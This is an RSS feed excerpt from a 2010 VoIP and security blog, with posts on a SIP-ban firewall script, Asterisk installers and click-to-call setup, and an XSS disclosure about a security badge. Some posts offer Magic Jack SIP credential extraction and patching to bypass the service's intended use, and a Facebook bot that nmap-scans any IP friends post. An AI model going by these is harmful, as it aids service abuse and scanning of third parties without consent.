				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=289</guid>
		<description><![CDATA[SIPBAN v1.0 What is SIPBAN: SIPBAN is an addon for the advance policy firewall written by “R-FX Networks (http://www.rfxn.com)”. This addon is will search your asterisk logs for failed registration attempts from unknown networks and ban the IP address. This helps thwart SIP secret guessing and other SIP based attacks. How to configure and use [...]]]></description>
			<content:encoded><![CDATA[<p><strong>SIPBAN v1.0</strong></p>
<p><strong>What is SIPBAN:</strong></p>
<p>SIPBAN is an addon for the advance policy firewall written by “R-FX Networks (<a href="http://www.rfxn.com">http://www.rfxn.com</a>)”. This addon is will search your asterisk logs for failed registration attempts from unknown networks and ban the IP address. This helps thwart SIP secret guessing and other SIP based attacks.</p>
<p><span id="more-289"></span></p>
<p><strong>How to configure and use the script:</strong></p>
<p>Configuration of the script is done by variables. The most important variables are gIP1 and gIP2. These variables are where you can define friendly networks not to ban. For example your work network is 192.168.2.x. So gIP1 would look like this gIP1=192.168.2. You could do just 192.168 but that leaves a lot of room for IP spoofing even though that is a RFC 1918 IP. You can use gIP2 for your home network or a remote office. To add more friendly networks just add more gIP variables in the variable section and edit line 15 of the script by adding an addition “ | grep –v “$gIP#” to the line right after the last one. Repeat this as much as you need to.</p>
<p>Once you made those changes save the script and change the permission of the script using chmod so it now executable.</p>
<p>Before you execute the script make sure you have “APF” installed and configured to your requirements. To configure APF for use in a PBX in environment leave egress filtering to  “0” as in disabled and set ingress filtering to TCP 22, 80 and UDP 5060_6000 and 10000_20000. Once that is done make sure that APF is still in development mode . This insures that if you ban yourself or if you did not set the ports right you will be able to get back in after 5 minutes. Finally start APF by issuing the command apf –s.</p>
<p>Now that APF is running run a test of SIPBAN. To do this run the command ./sipban.sh. Nothing will show on the screen. Once it returns back to a command line you can view the log at /var/tmp/sipban.log. If everything looks successful then you can edit the APF config to take it out of development mode and restart APF.</p>
<p>At this point you are ready to schedule SIPBAN via the cron to run on whatever cycle you want. Since it is parsing a large log file I would do a minimum of 1 hour depending on how much ram your PBX has.</p>
<p>0 * * * * /root/sipban.sh</p>
<p><strong>Where to get SIPBAN:</strong></p>
<p>To get a copy of SIPBAN click the following link <a href="http://www.digitaloffensive.com/files/sipban.sh">http://www.digitaloffensive.com/files/sipban.sh</a></p>
<p>If you have any questions or comments please feel free to contact us.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F10%2Fsipban-for-apf%2F&amp;title=SIPBAN%20for%20APF" id="wpa2a_48"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/10/sipban-for-apf/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>AutoRAFI (Automatic Remote Asterisk and FreePBX  Install) for Fedora and CentOS</title>
		<link>http://www.digitaloffensive.com/2010/10/autorafi-automatic-remote-asterisk-and-freepbx-install-for-fedora-and-centos/</link>
		<comments>http://www.digitaloffensive.com/2010/10/autorafi-automatic-remote-asterisk-and-freepbx-install-for-fedora-and-centos/#comments</comments>
		<pubDate>Tue, 05 Oct 2010 00:43:06 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=282</guid>
		<description><![CDATA[AUTORAFI (Automatic Remote Asterisk and FreePBX Install) About: AUTORAFI is a Linux shell script developed by Digital Offensive to either locally or remotely install an Asterisk based PBX solution with FreePBX front end. AUTORAFI was developed and tested on base installs of CentOS and Fedora Core. Why: Over the last few years we have been [...]]]></description>
			<content:encoded><![CDATA[<p><strong>AUTORAFI (Automatic Remote Asterisk and FreePBX  Install)</strong></p>
<p><strong>About:</strong><br />
AUTORAFI is a Linux shell script developed by Digital Offensive to either locally or remotely install an Asterisk based PBX solution with FreePBX front end.  AUTORAFI was developed and tested on base installs of CentOS and Fedora Core.<br />
<span id="more-282"></span><br />
<strong>Why:</strong><br />
Over the last few years we have been installing more and more of these solutions so we have taken the time to automate as much as we can to save time. Now we are offering AUTORAFI to the general public to make your lives easier.</p>
<p><strong>Requirements:</strong><br />
1.	System running either CentOS or Fedora Core.<br />
2.	SSH or console access<br />
3.	root access<br />
4.	Basic knowledge of Linux text editors<br />
5.	Internet access<br />
6.	Patience: install can take up to 1 ½ hours depending on your internet connection and your system configuration.<br />
7.	If you are running behind a firewall you will need to review this article for special firewall and FreePBX configuration: http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat</p>
<p><strong>Use:</strong><br />
1.	Copy the script to your server.<br />
2.	Use your favorite Linux text editor to change the user variables<br />
      a. Uncomment the following sections if they apply to you<br />
           i.Webmin: Lines  112-114<br />
           ii.DAHDI:  Lines 180-185<br />
3.	Make sure it has a .sh extension<br />
4.	Chmod 777 script_name.sh<br />
5.	./script_name.sh<br />
6.	Follow prompts!!<br />
        a. If you see warnings it is ok to proceed. It is when you see major errors, or failures that you need to stop the install.</p>
<p><strong>Cost:</strong><br />
AutoRAFi costs $175.00. Since this is a digital product and the source is fully viewable there is no refund. We will work with you to correct any issues. To purchase this please visit our product page: <a href="http://www.digitaloffensive.com/products-page/voip-sip/autorafi-automatic-remote-asterisk-and-freepbx-install/">Products</a></p>
<p><strong>Support:</strong><br />
This script was developed and tested thoroughly on Fedora and CentOS. We ran it over 100x on each OS working out all the flaws.<br />
We provide limited email support for free for this script. We plan to eventually offer a ticket system for this script if it is required. To get support please send a detail email with exact errors (Screen shots) to support@digitaloffensive.com<br />
Free updates of this script will be provided to those that have purchased it.<br />
If you need support configuring FreePBX, or anything else outside of this script and would like our help our hourly rate is $50.00 an hour. Min 2 hours.<br />
Check out http://www.digitaloffensive.com for more info on our services.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F10%2Fautorafi-automatic-remote-asterisk-and-freepbx-install-for-fedora-and-centos%2F&amp;title=AutoRAFI%20%28Automatic%20Remote%20Asterisk%20and%20FreePBX%20%20Install%29%20for%20Fedora%20and%20CentOS" id="wpa2a_50"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/10/autorafi-automatic-remote-asterisk-and-freepbx-install-for-fedora-and-centos/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Update:Magic Jack update breaks sip retrieval</title>
		<link>http://www.digitaloffensive.com/2010/09/updatemagic-jack-update-breaks-sip-retrieval/</link>
		<comments>http://www.digitaloffensive.com/2010/09/updatemagic-jack-update-breaks-sip-retrieval/#comments</comments>
		<pubDate>Mon, 06 Sep 2010 13:02:49 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=278</guid>
		<description><![CDATA[Reports are coming in that as of this past weekend the ability to recover your SIP credentials is once again working and the password is not constantly changing. the question is how long will this work for. The thing is no matter what happens there will always be people out there trying to get around [...]]]></description>
			<content:encoded><![CDATA[<p>Reports are coming in that as of this past weekend the ability to recover your SIP credentials is once again working and the password is not constantly changing. the question is how long will this work for. The thing is no matter what happens there will always be people out there trying to get around it. It is the same for any technology out there.</p>
<p>For the time being we are offering SIP retrieval once again. Though once we pull your information we will test it and once tested and confirmed working payment will be non returnable. So if they change this a week from now you can not ask for a refund.</p>
<p>For those that want to do it themselves my articles will still help you do this. If you find my article useful please visit a sponsor or two as they help to pay for my time and hosting fees.</p>
<p>Side note is reports also state that the username for some is ending in 02.</p>
<p>Good Luck</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F09%2Fupdatemagic-jack-update-breaks-sip-retrieval%2F&amp;title=Update%3AMagic%20Jack%20update%20breaks%20sip%20retrieval" id="wpa2a_52"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/09/updatemagic-jack-update-breaks-sip-retrieval/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook Bot: FBCbot.pl</title>
		<link>http://www.digitaloffensive.com/2010/08/facebook-bot-fbcbot-pl/</link>
		<comments>http://www.digitaloffensive.com/2010/08/facebook-bot-fbcbot-pl/#comments</comments>
		<pubDate>Tue, 31 Aug 2010 16:39:26 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=271</guid>
		<description><![CDATA[Facebook Bot: FBCbot.pl FBCbot is a bot written in Perl to interface with Facebook on the users behalf. The bot is still in its infant stage and could definitely be improved upon. Currently FBCbot was developed on Linux though since it is written in Perl it can be modified to run on Windows as well. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Facebook Bot: FBCbot.pl</strong></p>
<p>FBCbot is a bot written in Perl to interface with Facebook on the users behalf. The bot is still in its infant stage and could definitely be improved upon. Currently FBCbot was developed on Linux though since it is written in Perl it can be modified to run on Windows as well. The FBCbot was developed in a way to allow for quick writing and adding of additional modules to it. Side note I am pretty new to programming in Perl, so if you see something that could be improved please let me know.</p>
<p><span id="more-271"></span></p>
<p>FBCbot works by checking all your friends status updates for key words that are predefined as commands in the bot. By default FBCbot comes with two modules. The “nmap” module allows users to post the command nmap xxx.xxx.xxx.xxx , where the xxx.xxx.xxx.xxx is the IP to NMAP. Once it is done scanning the IP it will post the results back to the wall of the user that issued the command. The “ping” module allows users to post the command pingpong xxx.xxx.xxx.xxx, where the xxx.xxx.xxx.xxx is the IP to PING. Once it is done pinging the IP it will post the results back to the wall of the user that issued the command.</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/08/nmap.jpg"><img class="aligncenter size-medium wp-image-274" title="nmap" src="http://www.digitaloffensive.com/wp-content/uploads/2010/08/nmap-300x235.jpg" alt="" width="300" height="235" /></a><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/08/pingpong.jpg"><img class="aligncenter size-medium wp-image-275" title="pingpong" src="http://www.digitaloffensive.com/wp-content/uploads/2010/08/pingpong-300x209.jpg" alt="" width="300" height="209" /></a></p>
<p>To use FBCbot you will need to have a Perl interpreter installed on your operating system. I am currently using the default one that comes with Linux. You will need a way to schedule the bot to run, I currently use the cron to have it check every x amount of minutes. You will also need the Facebook command line application that was written by Dave Tompkins over at <a href="http://fbcmd.dtompkins.com/">http://fbcmd.dtompkins.com/</a>. This allows you to send commands via command line to Facebook as well as craft custom Facebook queries like you would do in SQL. Facebook command line runs on both Linux and Windows as well. Once you have this application you will need to overwrite the original fbcmd.php with my modified one. The modified one is provided in the zip along with FBCbot.pl: <a title="http://www.digitaloffensive.com/files/fbcbot.zip" href="http://www.digitaloffensive.com/files/fbcbot.zip" target="_blank">http://www.digitaloffensive.com/files/fbcbot.zip</a></p>
<p>I altered the original fbcmd.php file to add a common delimiter to the “fstatus” output to make separating the username and the command easier since the white space between the username and status is never the same. To do this I added “::” to be printed out right before the actual status</p>
<p>To add additional modules to FBCbot you can use the “elsif” syntax in Perl. Basically you would say</p>
<p>If $command = “x” then do “y” elsif $command =”a” then do “b” and so on. Just make sure to use proper syntax and close everything you open.</p>
<p>The current limitations to FBCbot are that it can only do 10 wall posts day. More than that will have it blocked for 48 hours. I am currently thinking of implementing a way that a user can provide an email address to have the results mailed to but that is a future though if more development is done FBCbot. I also need to take into consideration how to handle people leaving commands in their status over long periods of time.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F08%2Ffacebook-bot-fbcbot-pl%2F&amp;title=Facebook%20Bot%3A%20FBCbot.pl" id="wpa2a_54"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/08/facebook-bot-fbcbot-pl/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Magic Jack update breaks sip retrieval</title>
		<link>http://www.digitaloffensive.com/2010/08/magic-jack-update-breaks-sip-retrieval/</link>
		<comments>http://www.digitaloffensive.com/2010/08/magic-jack-update-breaks-sip-retrieval/#comments</comments>
		<pubDate>Thu, 26 Aug 2010 22:15:01 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=262</guid>
		<description><![CDATA[WARNING: Do not plug your Magic Jack in for any updates even if you need to renew. There seems to be a recent update that is causing the password to change on every registration. We have been able to rule out the following false information that is circulating on the net. From the dumps and [...]]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff0000;"><strong>WARNING:</strong></span> Do not plug your Magic Jack in for any updates even if you need to renew. There seems to be a recent update that is causing the password to change on every registration.</p>
<p>We have been able to rule out the following false information that is circulating on the net. From the dumps and the traffic we captured they are still using proxy01 and the user account is still E########01.</p>
<p>Until we can get a few test Jacks to test with we are temporarily removing the SIP retrieval service.</p>
<p>If you have a jack you want to donate please contact us as we work on this issue.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F08%2Fmagic-jack-update-breaks-sip-retrieval%2F&amp;title=Magic%20Jack%20update%20breaks%20sip%20retrieval" id="wpa2a_56"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/08/magic-jack-update-breaks-sip-retrieval/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Is your site truly secure if the little box says it is?</title>
		<link>http://www.digitaloffensive.com/2010/08/is-your-site-truly-secure-if-the-little-box-says-it-is/</link>
		<comments>http://www.digitaloffensive.com/2010/08/is-your-site-truly-secure-if-the-little-box-says-it-is/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 13:06:39 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=241</guid>
		<description><![CDATA[Is your site truly secure if the little box says it is? Site verified secure! You see this on many sites out there. They all proudly display an image from a company saying that their site is scanned daily and has been determined secure. How many of these sites truly verify your site is secure? [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Is your site truly secure if the little box says it is?</strong></p>
<p>Site verified secure! You see this on many sites out there. They all proudly display an image from a company saying that their site is scanned daily and has been determined secure. How many of these sites truly verify your site is secure? Have you checked your site lately?</p>
<p>While doing some research on a product I was interested in, I stumbled upon a cross site scripting vulnerability in the search box of the vendor’s website.  I was not to concern, as many search boxes on the internet are vulnerable to XSS.  I was about to move on until I noticed this iamge at the bottom of the page:</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/08/mcsec.jpg"><img class="aligncenter size-full wp-image-242" title="mcsec" src="http://www.digitaloffensive.com/wp-content/uploads/2010/08/mcsec.jpg" alt="" width="129" height="45" /></a></p>
<p><span id="more-241"></span></p>
<p>Interesting! According to McAfee, this site is Secure, but I have just proven it is not. So the first question that popped into my head is, what does McAfee consider secure and what is actually checked when using their service.</p>
<p>According to their service offering, they do the following to each site they monitor:</p>
<p>“* Network Security Audits are audits conducted to ascertain the compliance of network Devices with certain published security standards and to disclose security vulnerabilities and may include, but are not limited to, port scanning and port connections, evaluating services by checking versions and responses to certain requests, and crawling a website to perform testing of forms, application responses, or the confirm the existence of certain files.”</p>
<p>My understanding of the above is that they “do” provide the ability to readily check for cross site scripting vulnerabilities. Though for some reason they did not pick this up on the site I reviewed. So, I continued reading their user agreement to see what their responsibility is. Under the section that says: “No Guarantee” They basically state they do not offer any guarantee your site is secure and are not responsible for the security of your site.</p>
<p>On average the McAfee Secure service costs between a few hundred to a few thousand dollars, depending on the amount of traffic your website generates. The question is what are you paying for if they provide no assurance of the security of your site? In my honest opinion this is just a huge marketing ploy. You are paying large sums of money to display an “AD” on your site to say that your site is secure and promote their service, even if it may not be.  McAfee itself pushes this service saying it will “Increase your sales conversions by 12% with McAfee SECURE”.</p>
<p style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/08/mc.jpg"><img class="aligncenter size-medium wp-image-243" title="mc" src="http://www.digitaloffensive.com/wp-content/uploads/2010/08/mc-300x89.jpg" alt="" width="300" height="89" /></a></p>
<p>I wonder how many companies that buy this service have a clue what they are truly buying.  I wonder how many of them actually run an audit themselves on their site to assure the safety of the data and clients. I wonder how many people have setup rules in their firewalls or IPS devices to alert them when these scans initiate to assure they are even getting scanned.</p>
<p>In defense of McAfee, I believe they probably do run a low end scan against the sites using a tool like Nessus or Nmap (probably actually something custom since they bought Foundstone, but still along the same line) that will check for ports and banners. I don’t think they are truly doing application level checking of sites as this is still not 100% reliable via automation. From my reading about their service since I do not have it, it seems that the end user has a lot of control in the setup and administration of their accounts. They can define the IP’s to scan as well as the policies to scan with. So the above issue and the issues I found on several of the sites displaying the “McAfee Secure” image could also be due to end users.</p>
<p>After all this research, I decided to contact McAfee and tell them about the issue. So I did a online chat session with a McAfee Secure tech. This is where I lost all respect for their service offering and what has caused me to write this article.</p>
<p>I started off asking them what they verify the site is secure against and the agent could not tell me. Next I told the agent that I found a site that displays their image, yet it contains a vulnerability. He asked for the sites info and I gave it to him. He then asked what the issue was and I told him I was able to execute cross site scripting on the site and redirect users to other sites and content. He had no idea what cross site scripting was. I gave him a example piece of JavaScript that would pop up a msg box saying “1”. He pasted the code in the box and his browser did not do anything or at least he said it did not. I told him I verified this issue on IE and Firefox. He could not tell me what browser he was using. I am expecting he was using something to block cross site scripting on the client side or McAfee was blocking it at the enterprise. At this point he told me my computer had issues and that site is secure if it is displaying the image. Below is a screen shot of the final part of our conversation.</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/08/chat.jpg"><img class="aligncenter size-full wp-image-244" title="chat" src="http://www.digitaloffensive.com/wp-content/uploads/2010/08/chat.jpg" alt="" width="475" height="377" /></a></p>
<p>To wrap this up make sure you know what you are buying. Don’t ever put full faith into any one security product or solution, everything out there has a hole or weakness. The age old saying &#8220;defense in depth&#8221; is still alive today.</p>
<p>I also contacted the sites that were vulnerable to XSS and included the response I got from McAfee. I told them to follow up with McAfee to have their issues resolved.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F08%2Fis-your-site-truly-secure-if-the-little-box-says-it-is%2F&amp;title=Is%20your%20site%20truly%20secure%20if%20the%20little%20box%20says%20it%20is%3F" id="wpa2a_58"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/08/is-your-site-truly-secure-if-the-little-box-says-it-is/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ADA: Asterisk Desktop Assistant by Diginum (auto dialer)</title>
		<link>http://www.digitaloffensive.com/2010/08/ada-asterisk-desktop-assistant-by-diginum-auto-dialer/</link>
		<comments>http://www.digitaloffensive.com/2010/08/ada-asterisk-desktop-assistant-by-diginum-auto-dialer/#comments</comments>
		<pubDate>Mon, 02 Aug 2010 18:26:45 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=239</guid>
		<description><![CDATA[ADA: Asterisk Desktop Assistant by Diginum The Asterisk Desktop Assistant is a plug-in that allows you to be able to click on telephone numbers inside of Microsoft Office Products, Firefox and Thunder Bird. Once you click on the number it will ring your phone, once you answer it will then dial and connect you to [...]]]></description>
			<content:encoded><![CDATA[<p>ADA: Asterisk Desktop Assistant by Diginum</p>
<p>The Asterisk Desktop Assistant is a plug-in that allows you to be able to click on telephone numbers inside of Microsoft Office Products, Firefox and Thunder Bird. Once you click on the number it will ring your phone, once you answer it will then dial and connect you to the number you clicked.</p>
<p>The Asterisk Desktop Assistant can be found her for download: <a href="http://blogs.digium.com/2008/12/22/asterisk-desktop-assistant-windows-click-to-call-and-more/">http://blogs.digium.com/2008/12/22/asterisk-desktop-assistant-windows-click-to-call-and-more/</a></p>
<p>Though Diginum provides a great website and a lot of data on how to install this plug-in their directions are extremely high level and it takes more tweaking then they have documentation on.</p>
<p><span id="more-239"></span></p>
<p>First thing to do is make sure that the firewall protecting your Asterisk box allows port 5038 inbound to it if you are using the ADA plug-in remotely. Next if working remotely makes sure that if you are behind a firewall that it allows port 5038 outbound.</p>
<p>Second we will need to make some changes to your Asterisk PBX.  I am going to assume that you are running a version of Asterisk that has FreePBX. If this is the case you will have to edit two files manually on the system as well as have at least 1 extension configured that you want to use.</p>
<p>1. The first file you will want to edit is /etc/asterisk/manager_custom.conf</p>
<p>You will want to add the following to the file:</p>
<p>[1001] &lt;&#8211; This is the extension / username, change to fit your system</p>
<p>secret = ******  &lt;&#8211; password to use</p>
<p>permit=0.0.0.0/0.0.0.0  &lt;&#8211; Where to allow connections from. I suggest locking it down</p>
<p>deny=10.0.0.1/255.255.255.255  &lt;&#8211; Where to deny connections from</p>
<p>read = system,call,log,verbose,command,agent,user &lt;&#8211; permissions for the user on AGI</p>
<p>write = system,call,log,verbose,command,agent,user  &lt;&#8211;permissions for the user on AGI</p>
<p>2. The next file you will want to edit is /etc/asterisk/extensions_custom.conf</p>
<p>You will want to add this to the bottom of that file:</p>
<p>[ada] &lt;&#8211; context</p>
<p>include =&gt; from-internal</p>
<p>exten =&gt; 1001,1,Dial(SIP/1001) ßchange the 1001 to your extension</p>
<p>3. Now that is down issue the command asterisk –rx “core restart gracefully”</p>
<p>Third we will look at the actual install and configuration of the ADA plug-in on your windows system. The installation is pretty straight forward as you just click the setup and it installs. Once it is installed you will need to configure it to talk to your Asterisk box.</p>
<p>1. Install the ADA software. It can be downloaded here <a href="http://dl1.digium.com/ADA1.1/ADAInstall.exe">http://dl1.digium.com/ADA1.1/ADAInstall.exe</a>; make sure that Firefox and any Microsoft application is closed before starting the install.</p>
<p>2. You will see it show up on your screen and in the lower right hand corner of your computer taskbar. To configure it simply right click on it and choose settings.</p>
<p>3. Only tab you need to worry about is the general tab where you will choose Asterisk and enter your Asterisk IP or hostname.</p>
<p>4. Choose Save Settings.</p>
<p>5. On the main screen enter the user name and password of the user you created above.</p>
<p>Fourth we will need to make some changes to the ADA system files for it to work with FireFox and ThunderBird.</p>
<p>1. There is a version restriction in the ADA software on what version of Firefox and Thunderbird it can work on. To get around this you will need to edit the following file in notepad: C:\Program Files\Digium\ADA\Mozilla\install.rdf. Look for the line &lt;em:maxVersion&gt; and change the number to something like 9.0 then save the file.</p>
<p>2. Next reboot the computer. Once the computer reboots your FireFox and Thunderbird will be ready to go.</p>
<p>Now you should see telephone numbers show up as links. If you hover over the links it should have a tag like this ada://717xxxxxxx. If you click that it will dial the number.</p>
<p>Fifth and final we will make the required changes to Microsoft Office. This will need to be done in each of the office products you run. At the time of writing this I am currently running Office 2007 at work and Office 2010 at home.</p>
<p>1. Click on the round office icon in the upper left hand column of the office product you are setting up.</p>
<p>2. Click on “That products name” options.</p>
<p>3. Click on Add-Ins</p>
<p>4. Click where it says Manage and choose “Smart Tags” and make sure to click on ADA (ADASmartTags) and then click on go.</p>
<p>5. Press ok.</p>
<p>Now you should be able to right click the number and choose dial.</p>
<p>If you have any questions comments or concerns please feel free to contact us. If you found this article useful please feel free to help support us.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F08%2Fada-asterisk-desktop-assistant-by-diginum-auto-dialer%2F&amp;title=ADA%3A%20Asterisk%20Desktop%20Assistant%20by%20Diginum%20%28auto%20dialer%29" id="wpa2a_60"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/08/ada-asterisk-desktop-assistant-by-diginum-auto-dialer/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>AMJchan: Automating the chan_sip.so patching for Magic Jack</title>
		<link>http://www.digitaloffensive.com/2010/07/amjchan-automating-the-chan_sip-so-patching-for-magic-jack/</link>
		<comments>http://www.digitaloffensive.com/2010/07/amjchan-automating-the-chan_sip-so-patching-for-magic-jack/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 18:58:29 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=232</guid>
		<description><![CDATA[AMJchan: Automating the chan_sip.so patching for Magic Jack AMJchan is a shell script written by the Digital Offensive team to quickly and accurately patch your Asterisk server for use with the Magic jack. This script was developed and tested on Centos, fedora and Redhat. The script can be easily altered to use another package manager [...]]]></description>
			<content:encoded><![CDATA[<p>AMJchan: Automating the chan_sip.so patching for Magic Jack</p>
<p>AMJchan is a shell script written by the Digital Offensive team to quickly and accurately patch your Asterisk server for use with the Magic jack. This script was developed and tested on Centos, fedora and Redhat. The script can be easily altered to use another package manager other then yum to make it cross system compliant.</p>
<p><span id="more-232"></span></p>
<p>As many of you already know that to use a Magic Jack in any means other than the intended means  you are required to use a proxy. The Proxy facilitates the md5 hashing of the connection. In most cases people choose to use mjproxy, for Linux, some routers and ATA devices or MJMD5.exe for windows based systems. The actual patch was not developed by us and we cannot take credit for that. From my resources the patch was developed by 2 individuals DTM and Teddy_b. The patch allows you to run your Asterisk PBX without using a proxy.</p>
<p>AMJchan does the following for you:</p>
<ol>
<li>Checks to find out what version of Asterisk you are running</li>
<li>Checks to make sure you have the needed tools (wget and patch)</li>
<li>Installs needed tools if you do not.</li>
<li>Downloads the Asterisk SRC that matches the version you have installed.</li>
<li>Downloads the Magic Jack chan_sip patch code.</li>
<li>Backups your original chan_sip.so and .c files</li>
<li>Patches the chan_sip</li>
<li>Makes the new chan_sip</li>
<li>Stops the asterisk process</li>
<li>Copies the new chan_sip into production</li>
<li>Restarts asterisk</li>
</ol>
<p>To download the script click here: <a href="http://www.digitaloffensive.com/files/amjchan.sh">http://www.digitaloffensive.com/files/AMJchan.sh</a></p>
<p>AMJchan should be run as root to insure that you do not have any permission issues. The Digital Offensive does not take any responsibility for your use of this script.</p>
<p>If you have any questions or feedback please feel free to contact us and if this script helped you feel free to support us through a donation if you see fit.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F07%2Famjchan-automating-the-chan_sip-so-patching-for-magic-jack%2F&amp;title=AMJchan%3A%20Automating%20the%20chan_sip.so%20patching%20for%20Magic%20Jack" id="wpa2a_62"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/07/amjchan-automating-the-chan_sip-so-patching-for-magic-jack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Commission based position available with Digital Offensive</title>
		<link>http://www.digitaloffensive.com/2010/07/commission-based-position-available-with-digital-offensive/</link>
		<comments>http://www.digitaloffensive.com/2010/07/commission-based-position-available-with-digital-offensive/#comments</comments>
		<pubDate>Fri, 16 Jul 2010 14:08:15 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=229</guid>
		<description><![CDATA[Commission based position available with Digital Offensive Looking for someone that has the time, motivation and ability to generate leads and write proposals to help grow our business. This is a commission based position and due to that there is no benefits being offered. All commissions will be based on the final contract amount and [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Commission based position available with Digital Offensive</strong></p>
<p>Looking for someone that has the time, motivation and ability to generate leads and write proposals to help grow our business. This is a commission based position and due to that there is no benefits being offered. All commissions will be based on the final contract amount and paid after successful completion and payment of the contract. At the current time we are not taking applications from recruiters. All applicants must be at least 18 years old to apply.</p>
<p><span id="more-229"></span></p>
<p><strong>You must have:</strong></p>
<ol>
<li>Good writing skills</li>
<li>Speaking skills</li>
<li>Basic understanding of computers. Knowledge of Information Security is a pro.</li>
<li>Must be US based and a citizen</li>
<li>Must be willing to sign a NDA</li>
</ol>
<p>If you are interested in this position please send your resume to us.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F07%2Fcommission-based-position-available-with-digital-offensive%2F&amp;title=Commission%20based%20position%20available%20with%20Digital%20Offensive" id="wpa2a_64"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/07/commission-based-position-available-with-digital-offensive/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
